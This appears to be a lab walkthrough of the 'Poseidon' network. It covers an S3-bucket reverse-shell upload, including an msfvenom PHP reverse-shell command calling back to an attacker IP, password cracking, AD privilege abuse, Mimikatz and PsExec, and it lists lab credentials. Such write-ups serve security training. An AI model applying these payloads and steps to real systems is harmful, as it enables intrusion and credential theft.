Skip to content

Poseidon

Network

Given:

  • 192.168.192.0/24

Found:

  • 192.168.167.168 storage (linux)
  • 192.168.167.169 DC01
  • 192.168.167.170 MS01
  • 192.168.167.171 MS02

Creds

eric.wallows:EricLikesRunning800
jeff.borrows:naruto
administrator:BigFeast999! (local admin from .171)

john.doe:anthony
jane.smith:abc123
bob.johnson:butterfly
jeff.borrows:naruto
alice.williams:andrew
charlie.brown:tweety

other users:

John.Lark
Jane.Smith
Alice.Owal
Bob.Johnson

Enumeration

Ping sweeping the subnet to find four machines.

192.168.167.168 storage

Enumeration

With feroxbuster, we discover /storage.

We can see those CSV files with curl.

And get four users.

This is an S3 bucket. Let's enumerate it.

We can upload objects, so we can try to upload a reverse shell.

msfvenom -p php/reverse_php LHOST=192.168.45.191 LPORT=6666 -o shell.php

192.168.167.170 MS01

Enumeration

We enter the service on the web server, and a CloudSync login appears. We use the provided credentials to log in.

Clicking "Sync Files."

Initial Access

Due to bad permissions on the bucket this service syncs from, we upload a reverse shell. Now, if we sync, we pull the shell.

We can access it and receive it with nc.

Post Exploitation

Get the flag.

We can see AWS keys.

$s3Client = new S3Client([
    'version' => 'latest',
    'region'  => 'us-east-1',
    'endpoint' => $endpoint,
    'use_path_style_endpoint' => true,
    'credentials' => [
        'key'    => 'AWS_KEY_47dbe0d90dcd71eb6b371e75e5fe9bc5',
        'secret' => 'AWS_SECRET_26ebe67e93fbd2f9e906a85275cab135',
    ],
]);

And enumerate domain users.

Using that key and configuring an AWS CLI profile shows that it is a root account, but there is nothing inside.

We can access the MySQL database using root.

The cloudsync table has some users. Let's try to crack the passwords.

We recovered six.

john.doe:anthony
jane.smith:abc123
bob.johnson:butterfly
jeff.borrows:naruto
alice.williams:andrew
charlie.brown:tweety

We can use bloodhound-python to scout the AD.

Now import it into BloodHound. We can see jeff.borrows has a "Generic All" to mario.lemieux.

Change Mario's password.

192.168.167.171 MS02

Enumeration

Initial Access

Using mario.lemieux and the new password.

Privilege Escalation

Mario has admin privileges, so transfer Mimikatz and get the administrator.

Reenter with the administrator, but with an interactive password.

Post Exploitation

Get the flag.

192.168.167.169 DC01

Enumeration

Initial Access

Using administrator credentials from MS02 (it's a domain admin), use PsExec with an interactive password.

Post Exploitation

Get the flag.